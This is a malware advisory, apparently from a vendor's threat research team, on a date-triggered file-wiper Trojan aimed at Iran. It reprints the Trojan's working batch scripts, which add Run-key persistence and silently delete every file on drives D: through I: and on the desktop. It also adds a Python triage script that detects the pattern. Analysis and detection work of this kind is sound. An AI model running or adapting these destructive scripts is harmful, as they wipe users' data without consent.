New File Wiper Trojan targeting Iran
The Dell SonicWALL Threats Research team received reports of a new file-wiper Trojan. Its purpose is simple: on a fixed set of dates, delete every file on a range of drive letters and on the current user's desktop. Any storage mounted under one of those letters is affected, whether a local partition, removable media or a mapped network share. It has been widely reported that the attack is targeted and that the Trojan is aimed at computers in Iran.
Infection cycle:
The Trojan drops the following files onto the filesystem. They are contained in the RAR-compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:
- %SYSTEM32%\jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%\juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
- %SYSTEM32%\SLEEP.EXE [non-malicious sleep utility]
- %USERPROFILE%\Local Settings\Temp\E.tmp\juboot.bat [dropped by juboot.exe]
- %USERPROFILE%\Local Settings\Temp\11.tmp\jucheck.bat [dropped by jucheck.exe]
The Trojan adds the following value to the Windows registry so that it is started again after a reboot:
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run  jucheck.exe = "%SYSTEM32%\jucheck.exe"
The file juboot.bat contains the following commands, which set up the Run-key persistence and launch the wiper component:
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32" "jucheck.exe"
The file jucheck.bat contains the following commands. It first removes the dropper (juboot.exe) and the original GrooveMonitor.exe from the user's Startup folder, then compares %date% against a hard-coded list of 27 dates (nine Monday-to-Wednesday windows between December 2012 and February 2015). On a match it waits and then deletes all files on whichever of drives D: through I: exist, runs Chkdsk on each, and finally wipes the user's desktop:
@echo off & setlocal
sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes
if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes
if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes
if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes
if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
IF EXIST e: Chkdsk e:
IF EXIST f: del "f:\*.*" /q /s /f
IF EXIST f: Chkdsk f:
IF EXIST g: del "g:\*.*" /q /s /f
IF EXIST g: Chkdsk g:
IF EXIST h: del "h:\*.*" /q /s /f
IF EXIST h: Chkdsk h:
IF EXIST i: del "i:\*.*" /q /s /f
IF EXIST i: Chkdsk i:
del "%userprofile%\Desktop\*.*" /q /s /f
start calc
:no
The .bat files are deleted after execution. Two points are worth noting for responders: the trigger compares the literal text of %date%, so it only matches on systems whose regional short-date format renders as, for example, "Mon 12/10/2012", and it is silently dead elsewhere; and because the payload uses del rather than overwriting file contents, the deleted data is often recoverable with standard forensic tools, so affected drives should be imaged rather than reused.
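As an added triage example (not SonicWALL's code or signatures), the script below applies the pattern described above to a batch file: it extracts every %date% gate, checks that each hard-coded weekday actually matches the calendar (a mismatched gate can never fire), lists the drive roots that are deleted quietly, recursively and forcibly, and flags Run-key persistence. The two sample batch texts are constructed from the listings in this advisory, with the drive block shortened; the regular expressions are this example's own heuristics, not GAV signatures.

```python
"""Heuristic triage of a Windows batch file for the date-gated wiper pattern
shown above. Added example, not SonicWALL's code; the two samples are
constructed from the advisory's batch listings (drive block shortened)."""
import re
from datetime import date, datetime

SAMPLE_JUBOOT = r'''@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32" "jucheck.exe"
'''

SAMPLE_JUCHECK = r'''@echo off & setlocal
sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes
if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes
if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes
if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes
if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes
if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes
if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes
if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes
if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del "d:\*.*" /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del "e:\*.*" /q /s /f
del "%userprofile%\Desktop\*.*" /q /s /f
start calc
:no
'''

WEEKDAYS = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
# %date% renders as "Mon 12/10/2012" only under a "ddd MM/dd/yyyy" short-date
# format, so these gates never fire on machines with other regional settings.
DATE_GATE = re.compile(r'if\s+"%date%"=="(\w{3}) (\d{2}/\d{2}/\d{4})"\s+goto', re.I)
ROOT_WIPE = re.compile(r'del\s+"([a-z]):\\\*\.\*"\s+/q\s+/s\s+/f', re.I)  # drive root
RUN_KEY = re.compile(r'reg\s+add\s+\S*CurrentVersion\\Run\b', re.I)  # persistence

def trigger_dates(bat_text):
    """[(weekday_label, date), ...] for every %date% gate, in script order."""
    return [(m.group(1), datetime.strptime(m.group(2), "%m/%d/%Y").date())
            for m in DATE_GATE.finditer(bat_text)]

def weekday_mismatches(triggers):
    """Gates whose hard-coded weekday disagrees with the calendar (dead gates)."""
    return [(lbl, d) for lbl, d in triggers if WEEKDAYS[d.weekday()] != lbl]

def next_trigger(triggers, today_iso):
    """Earliest gate on or after today_iso ("YYYY-MM-DD"), or None if all passed."""
    today = date.fromisoformat(today_iso)
    future = sorted(d for _, d in triggers if d >= today)
    return future[0] if future else None

def wiped_drives(bat_text):
    """Drive letters whose root is deleted quietly, recursively and forcibly."""
    return [m.group(1).lower() for m in ROOT_WIPE.finditer(bat_text)]

def triage(bat_text):
    triggers = trigger_dates(bat_text)
    drives = wiped_drives(bat_text)
    return {
        "date_gates": len(triggers),
        "dead_gates": weekday_mismatches(triggers),
        "wiped_drives": drives,
        "run_key_persistence": bool(RUN_KEY.search(bat_text)),
        "is_wiper": bool(triggers) and bool(drives),
    }

if __name__ == "__main__":
    for name, text in (("juboot.bat", SAMPLE_JUBOOT), ("jucheck.bat", SAMPLE_JUCHECK)):
        print(name, triage(text))
    print("next gate after 2013-01-01:",
          next_trigger(trigger_dates(SAMPLE_JUCHECK), "2013-01-01"))
```

Run against a suspect .bat read from disk, `triage()` separates the persistence stage (juboot.bat: Run key, no wipe) from the payload stage (jucheck.bat: 27 gates, drive roots wiped), and `next_trigger()` tells a responder how much time remains before the next window on a machine whose locale would actually satisfy the %date% comparison.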
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
- GAV: DelFiles.NBV (Trojan)
- GAV: Batchwiper.A (Trojan)